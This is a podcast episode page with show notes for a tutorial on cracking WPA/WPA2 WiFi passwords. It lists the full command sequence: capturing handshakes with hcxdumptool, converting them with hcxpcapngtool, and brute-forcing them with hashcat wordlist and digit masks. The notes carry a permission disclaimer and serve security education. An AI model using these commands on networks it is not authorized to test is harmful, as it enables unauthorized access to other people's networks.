We're sunsetting PodQuest on 2025-07-28. Thank you for your support!
Export Podcast Subscriptions
cover of episode #356: WiFi WPA WPA2 Vs Hashcat And Hcxdumptool

#356: WiFi WPA WPA2 Vs Hashcat And Hcxdumptool

2022/3/1
logo of podcast David Bombal

David Bombal

Shownotes Transcript

Big thanks to Cisco Meraki for sponsoring this video! Learn how to secure hybrid networks so you can stop these kinds of attacks: https://davidbombal.wiki/meraki

Apologies for the glitches in this video 😒 .... looks like the export of this video broke.... I had lots of issues uploading the original video to YouTube and had to export again quickly and it looks like something else broke. Hopefully won't happen again πŸ˜…

Disclaimer: This video is for educational purposes only. I own all equipment used for this demonstration. No actual attack took place on any websites. Only use the tools demonstrated in this video on networks you have permission to attack.

// Previous Videos // Kali Wifi Adapters: https://youtu.be/5MOsY3VNLK8 Old method using airmon-ng: https://youtu.be/WfYxrLaqlN8 Old method using GPUs: https://youtu.be/J8A8rKFZW-M

// COMMANDS // sudo systemctl stop NetworkManager.service sudo systemctl stop wpa_supplicant.service

sudo hcxdumptool -i wlan0 -o dumpfile.pcapng --active_beacon --enable_status=15

sudo systemctl start wpa_supplicant.service sudo systemctl start NetworkManager.service

hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng

hashcat -m 22000 hash.hc22000 wordlist.txt

Windows: hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d

// SOCIAL // Discord: https://discord.com/invite/usKSyzb Twitter: https://www.twitter.com/davidbombal Instagram: https://www.instagram.com/davidbombal LinkedIn: https://www.linkedin.com/in/davidbombal Facebook: https://www.facebook.com/davidbombal.co TikTok: http://tiktok.com/@davidbombal YouTube: https://www.youtube.com/davidbombal

// MY STUFF // Monitor: https://amzn.to/3yyF74Y More stuff: https://www.amazon.com/shop/davidbombal

// SPONSORS // Interested in sponsoring my videos? Reach out to my team here: [email protected]